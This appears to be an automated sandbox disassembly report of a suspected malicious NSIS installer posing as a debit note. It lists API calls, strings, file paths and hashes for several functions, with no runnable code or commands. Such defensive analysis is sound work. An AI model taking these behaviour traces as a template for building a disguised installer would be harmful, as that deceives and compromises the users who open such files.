ShowWindow.USER32(?,00000008), ref: 00405480
GetDlgItem.USER32(?,000003EC), ref: 004054A1
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
GetDlgItem.USER32(?,000003F8), ref: 004053AE

Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD

GetDlgItem.USER32(?,000003EC), ref: 004054F3
CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
CloseHandle.KERNELBASE(00000000), ref: 00405508
ShowWindow.USER32(00000000), ref: 0040552C
ShowWindow.USER32(?,00000008), ref: 00405531
ShowWindow.USER32(00000008), ref: 0040557B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
CreatePopupMenu.USER32 ref: 004055C0
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
GetWindowRect.USER32(?,?), ref: 004055F4
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
OpenClipboard.USER32(00000000), ref: 00405655
EmptyClipboard.USER32 ref: 0040565B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
GlobalLock.KERNEL32(00000000), ref: 00405671
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
GlobalUnlock.KERNEL32(00000000), ref: 004056A5
SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
CloseClipboard.USER32 ref: 004056B6

Strings

&B, xrefs: 00405621
{, xrefs: 00405599

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$&B
API String ID: 590372296-2518801558
Opcode ID: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
Opcode Fuzzy Hash: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

Function 00405F6A Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 0040602D
GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
CoTaskMemFree.OLE32(?), ref: 00406113
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
lstrlenW.KERNEL32(Call,00000000,004216C8,?,00405229,004216C8,00000000,00000000,00000000), ref: 00406191

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
Call, xrefs: 00405F94, 00406074, 00406095, 004060AA, 004060BD, 004060D9, 00406104, 00406136, 0040613C, 00406156, 0040616A, 0040618A, 00406190, 0040619C, 004061CF

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1230650788
Opcode ID: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
Opcode Fuzzy Hash: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

Function 004057D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 004057F9
lstrcatW.KERNEL32(Antegrade\Fravristelse213.Sto226,\*.*,Antegrade\Fravristelse213.Sto226,?,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405841
lstrcatW.KERNEL32(?,00409014,?,Antegrade\Fravristelse213.Sto226,?,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405864
lstrlenW.KERNEL32(?,?,00409014,?,Antegrade\Fravristelse213.Sto226,?,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 0040586A
FindFirstFileW.KERNELBASE(Antegrade\Fravristelse213.Sto226,?,?,?,00409014,?,Antegrade\Fravristelse213.Sto226,?,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 0040587A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
FindClose.KERNEL32(00000000), ref: 00405929

Strings

Antegrade\Fravristelse213.Sto226, xrefs: 00405829, 0040582F, 00405840, 00405879
"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe", xrefs: 004057D9
\*.*, xrefs: 0040583B
C:\Users\user\AppData\Local\Temp\, xrefs: 004057DE

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"$Antegrade\Fravristelse213.Sto226$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-338424149
Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E

Function 0040628B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00425738,Antegrade\Fravristelse213.Sto226,00405AE4,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,00000000,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0), ref: 00406296
FindClose.KERNEL32(00000000), ref: 004062A2

Strings

Antegrade\Fravristelse213.Sto226, xrefs: 0040628B
8WB, xrefs: 0040628C

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8WB$Antegrade\Fravristelse213.Sto226
API String ID: 2295610775-220311181
Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D

Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44

Function 004062B2 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
GetProcAddress.KERNEL32(00000000,?), ref: 004062E0

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9

Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
ShowWindow.USER32(?), ref: 00403D1B
DestroyWindow.USER32 ref: 00403D2F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
GetDlgItem.USER32(?,?), ref: 00403D6C
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
IsWindowEnabled.USER32(00000000), ref: 00403D87
GetDlgItem.USER32(?,00000001), ref: 00403E35
GetDlgItem.USER32(?,00000002), ref: 00403E3F
SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
GetDlgItem.USER32(?,00000003), ref: 00403F50
ShowWindow.USER32(00000000,?), ref: 00403F71
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
EnableWindow.USER32(?,?), ref: 00403F9E
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
EnableMenuItem.USER32(00000000), ref: 00403FBB
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
SetWindowTextW.USER32(?,004226E8), ref: 00404023
ShowWindow.USER32(?,0000000A), ref: 00404157

Strings

&B, xrefs: 00403FFB

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: &B
API String ID: 3282139019-3208460036
Opcode ID: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
Opcode Fuzzy Hash: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E

Function 0040391F Relevance: 52.7, APIs: 16, Strings: 14, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0

GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,77223420,00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00403939

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,77223420,00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 004039A0
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\brugerlicensaftalerne,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\brugerlicensaftalerne,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\brugerlicensaftalerne), ref: 00403A87
RegisterClassW.USER32(004281A0), ref: 00403AC4
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
ShowWindow.USER32(00000005,00000000), ref: 00403B47
LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
RegisterClassW.USER32(004281A0), ref: 00403B89
DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8

Strings

.DEFAULT\Control Panel\International, xrefs: 0040398B
1033, xrefs: 0040393F, 0040399B
"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe", xrefs: 00403922
C:\Users\user\brugerlicensaftalerne, xrefs: 004039AF, 004039B7, 00403A5A, 00403A60, 00403A70
RichEd20, xrefs: 00403B53
Control Panel\Desktop\ResourceLocale, xrefs: 00403953
_Nb, xrefs: 00403AA3, 00403B0B
&B, xrefs: 0040394B
RichEdit, xrefs: 00403B7A
Call, xrefs: 004039E7, 004039F0, 004039FE, 00403A4D, 00403A53
C:\Users\user\AppData\Local\Temp\, xrefs: 0040392B
RichEd32, xrefs: 00403B5E
.exe, xrefs: 00403A2D
RichEdit20W, xrefs: 00403B6B, 00403B71

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\brugerlicensaftalerne$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
API String ID: 2262724009-172814157
Opcode ID: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
Opcode Fuzzy Hash: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D

Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DD0
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,00000400), ref: 00402DEC

Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 00405BB8
Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 00402E35
GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C

Strings

soft, xrefs: 00402EAC
Inst, xrefs: 00402EA3
Null, xrefs: 00402EB5
"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe", xrefs: 00402DC5
C:\Users\user\Desktop, xrefs: 00402E17, 00402E1C, 00402E22
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
Error launching installer, xrefs: 00402E0C
C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe, xrefs: 00402DD6, 00402DE5, 00402DF9, 00402E16
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC9, 00402F94

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1225534506
Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD

Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\brugerlicensaftalerne\Isidora,?,?,00000031), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\brugerlicensaftalerne\Isidora,?,?,00000031), ref: 004017B8

Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55

Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

Strings

C:\Users\user\AppData\Local\Temp\nsb5059.tmp, xrefs: 00401804, 00401822
C:\Users\user\brugerlicensaftalerne\Isidora, xrefs: 00401781
C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll, xrefs: 00401818, 00401834
Call, xrefs: 00401770, 00401779, 00401786, 004017A4, 004017DA, 004017F0, 0040180E, 0040184A, 004018CB, 004018D4, 004018DE, 004018E9

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
